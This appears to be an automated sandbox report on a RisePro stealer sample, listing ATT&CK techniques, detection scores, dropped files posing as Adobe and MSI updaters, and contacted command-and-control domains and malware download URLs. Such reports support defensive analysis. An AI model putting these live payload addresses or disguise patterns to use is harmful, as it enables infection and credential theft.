Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	411 Process Injection	111 Deobfuscate/Decode Files or Information	1 Credential API Hooking	13 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	11 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Credential API Hooking	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	2 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	411 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OJa1BOigU3.exe	45%	ReversingLabs	Win32.Trojan.RiseProStealer
OJa1BOigU3.exe	42%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	100%	Avira	HEUR/AGEN.1323756
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	100%	Avira	HEUR/AGEN.1323756
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	100%	Avira	HEUR/AGEN.1323756
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	100%	Avira	HEUR/AGEN.1323756
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH1\MPGPH1.exe	0%	ReversingLabs
C:\ProgramData\MPGPH1\MPGPH1.exe	0%	Virustotal		Browse
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	62%	ReversingLabs	Win32.Spyware.Risepro
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	60%	Virustotal		Browse
C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	30%	Virustotal		Browse
C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	45%	ReversingLabs	Win32.Trojan.RiseProStealer
C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	62%	ReversingLabs	Win32.Spyware.Risepro
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	60%	Virustotal		Browse
C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	30%	Virustotal		Browse
C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	45%	ReversingLabs	Win32.Trojan.RiseProStealer
C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	45%	ReversingLabs	Win32.Trojan.RiseProStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe	62%	ReversingLabs	Win32.Spyware.Risepro
C:\Users\user\AppData\Local\RageMP1\RageMP1.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	45%	ReversingLabs	Win32.Trojan.RiseProStealer
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	62%	ReversingLabs	Win32.Spyware.Risepro

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
miniaturefinerninewjs.shop	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://purl.oen	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
miniaturefinerninewjs.shop	0%	Avira URL Cloud	safe
obsceneclassyjuwks.shop	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/api	0%	Avira URL Cloud	safe
http://5.42.66.10/download/th/Retailer_prog.exer	0%	Avira URL Cloud	safe
https://t.kr	0%	Avira URL Cloud	safe
http://193.233.132.253/retailerTest.exe	0%	Avira URL Cloud	safe
http://193.233.132.253/lumma2804.exepData	0%	Avira URL Cloud	safe
https://t.k&	0%	Avira URL Cloud	safe
http://crl.verisign.	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/api	10%	Virustotal		Browse
http://193.233.132.253/lumma2804.exelF	0%	Avira URL Cloud	safe
obsceneclassyjuwks.shop	1%	Virustotal		Browse
https://t.kr	0%	Virustotal		Browse
http://www.georss.org/georss	0%	Avira URL Cloud	safe
http://193.233.132.253/lumma2804.exesepro4	0%	Avira URL Cloud	safe
http://193.233.132.253/retailerTest.exe53/lumma2804.exe	0%	Avira URL Cloud	safe
miniaturefinerninewjs.shop	1%	Virustotal		Browse
http://193.233.132.253/retailerTest.exe	26%	Virustotal		Browse
http://crl.verisign.	0%	Virustotal		Browse
https://miniaturefinerninewjs.shop/apiZ	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apig	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apic	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apiq	0%	Avira URL Cloud	safe
http://www.georss.org/georss	1%	Virustotal		Browse
boredimperissvieos.shop	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apit	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/1	0%	Avira URL Cloud	safe
http://193.233.132.253/retailerTest.exeq	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apic	9%	Virustotal		Browse
sweetsquarediaslw.shop	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/	0%	Avira URL Cloud	safe
http://193.233.132.253/retailerTest.exeent	0%	Avira URL Cloud	safe
plaintediousidowsko.shop	0%	Avira URL Cloud	safe
sweetsquarediaslw.shop	11%	Virustotal		Browse
https://miniaturefinerninewjs.shop/	0%	Virustotal		Browse
acceptabledcooeprs.shop	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop/apig	8%	Virustotal		Browse
https://t.mZ	0%	Avira URL Cloud	safe
zippyfinickysofwps.shop	0%	Avira URL Cloud	safe
plaintediousidowsko.shop	1%	Virustotal		Browse
http://193.233.132.253/lumma2804.exe	100%	Avira URL Cloud	malware
http://193.233.132.253/lumma2804.exed	0%	Avira URL Cloud	safe
boredimperissvieos.shop	1%	Virustotal		Browse
holicisticscrarws.shop	0%	Avira URL Cloud	safe
https://miniaturefinerninewjs.shop:443/api	0%	Avira URL Cloud	safe
http://193.233.132.253/lumma2804.exe	26%	Virustotal		Browse
acceptabledcooeprs.shop	1%	Virustotal		Browse
https://t.mZ	0%	Virustotal		Browse
holicisticscrarws.shop	1%	Virustotal		Browse
https://miniaturefinerninewjs.shop:443/api	10%	Virustotal		Browse
zippyfinickysofwps.shop	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.186.192	true	false		high
miniaturefinerninewjs.shop	104.21.30.191	true	true	1%, Virustotal, Browse	unknown
db-ip.com	104.26.5.15	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://miniaturefinerninewjs.shop/api	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
miniaturefinerninewjs.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=84.17.40.101	false		high
obsceneclassyjuwks.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.253/retailerTest.exe	false	26%, Virustotal, Browse Avira URL Cloud: safe	unknown
boredimperissvieos.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
sweetsquarediaslw.shop	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
plaintediousidowsko.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
acceptabledcooeprs.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
zippyfinickysofwps.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.253/lumma2804.exe	false	26%, Virustotal, Browse Avira URL Cloud: malware	unknown
holicisticscrarws.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
https://duckduckgo.com/ac/?q=	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
https://db-ip.com/demo/home.php?s=84.17.40.101l	3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORTk	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000170D000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.42.66.10/download/th/Retailer_prog.exer	OJa1BOigU3.exe, 00000000.00000002.2346129634.000000000157A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=84.17.40.101t	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/demo/home.php?s=84.17.40.101q	RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://purl.oen	OJa1BOigU3.exe, 00000000.00000002.2346523945.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/risepro_bot101US1	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.kr	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001361000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=84.17.40.101:)	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro_botisepro_bot	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORTvS	RegAsm.exe, 0000002A.00000002.3509011004.00000000011EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/V=	RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io:443/widget/demo/84.17.40.101j	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000171A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io:443/widget/demo/84.17.40.101a	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro_botlaterH	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp	false		high
http://static.tumblr.com/hgchgxz/9ualgdf98/icon.png	Microsoft.Data.Services.nuspec	false		high
https://db-ip.com/demo/home.php?s=84.17.40.101dresss	3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	OJa1BOigU3.exe, 00000000.00000002.2345345627.000000000026D000.00000002.00000001.01000000.00000003.sdmp, 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3501913330.000000000109D000.00000002.00000001.01000000.00000006.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3501554784.000000000079D000.00000002.00000001.01000000.00000007.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3501305233.000000000079D000.00000002.00000001.01000000.00000007.sdmp, v6ggwc2fJXXgIu5fzDQ2.exe, 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV1.exe, 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3501914697.000000000086D000.00000002.00000001.01000000.0000000C.sdmp, MSIUpdaterV1.exe, 0000001C.00000002.2896175092.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, RegAsm.exe, 0000002C.00000002.3500058845.000000000055D000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
https://ipinfo.io/I	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/widget/demo/84.17.40.101uePK	3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001CFF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORT	3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001CCE000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3506110613.000000000161E000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.00000000016A7000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3505470905.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000150A000.00000004.00000020.00020000.00000000.sdmp, RLhyDRs2UHaLI0bTHvNtryI.zip.0.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	OJa1BOigU3.exe, 00000000.00000003.2156086126.0000000005DED000.00000004.00000020.00020000.00000000.sdmp, TEwtthWU56IyHistory.0.dr, AGHAk_8e2iEiHistory.0.dr	false		high
https://www.ecosia.org/newtab/	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
http://193.233.132.253/lumma2804.exepData	OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/A	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001687000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	D87fZN3R3jFeplaces.sqlite.0.dr	false		high
https://t.me/risepro_botlateri	RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORTNlI	MSIUpdaterV1.exe, 00000009.00000002.3506110613.000000000161E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/	RegAsm.exe, 0000002C.00000002.3509342638.0000000001537000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.0000000001582000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000158F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.maxmind.com/en/locate-my-ip-address	v6ggwc2fJXXgIu5fzDQ2.exe, MSIUpdaterV1.exe	false		high
https://ipinfo.io:443/widget/demo/84.17.40.101-	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.k&	RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.verisign.	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.253/lumma2804.exelF	OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/risepro.1010	RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.georss.org/georss	Microsoft.Data.Services.dll	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	TEwtthWU56IyHistory.0.dr, AGHAk_8e2iEiHistory.0.dr	false		high
http://193.233.132.253/lumma2804.exesepro4	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=84.17.40.101datacabW	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io:443/widget/demo/84.17.40.101	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001515000.00000004.00000020.00020000.00000000.sdmp, 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D45000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000158F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/RiseProSUPPORTy	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.00000000016A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	D87fZN3R3jFeplaces.sqlite.0.dr	false		high
http://ocsp.sectigo.com0	OJa1BOigU3.exe, AdobeUpdaterV1.exe.0.dr, MSIUpdaterV1.exe.0.dr, Retailer_prog[1].exe.0.dr	false	URL Reputation: safe	unknown
https://db-ip.com/demo/home.php?s=84.17.40.101kL(	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro_botwX~	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false		high
http://193.233.132.253/retailerTest.exe53/lumma2804.exe	OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://miniaturefinerninewjs.shop/apiZ	RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
https://db-ip.com/-	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	OJa1BOigU3.exe, 00000000.00000003.2156086126.0000000005DED000.00000004.00000020.00020000.00000000.sdmp, TEwtthWU56IyHistory.0.dr, AGHAk_8e2iEiHistory.0.dr	false		high
https://miniaturefinerninewjs.shop/apic	RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://db-ip.com/&bd	MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miniaturefinerninewjs.shop/apig	RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://db-ip.com/B	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.opengis.net/gml	Microsoft.Data.Services.dll	false		high
https://db-ip.com/D	RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miniaturefinerninewjs.shop/apiq	RegAsm.exe, 00000029.00000002.2783862547.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://miniaturefinerninewjs.shop/apit	RegAsm.exe, 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://miniaturefinerninewjs.shop/1	RegAsm.exe, 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	TEwtthWU56IyHistory.0.dr, AGHAk_8e2iEiHistory.0.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
https://db-ip.com/5	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro_bot4.17.	RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://193.233.132.253/retailerTest.exeq	OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/v	RegAsm.exe, 0000002A.00000002.3509011004.0000000001267000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miniaturefinerninewjs.shop/	RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.2783994618.000000000102C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.2784153638.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/risepro_bot7	3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/I	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
http://193.233.132.253/retailerTest.exeent	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/G	RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.mZ	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	OJa1BOigU3.exe, AdobeUpdaterV1.exe.0.dr, MSIUpdaterV1.exe.0.dr, Retailer_prog[1].exe.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	false		high
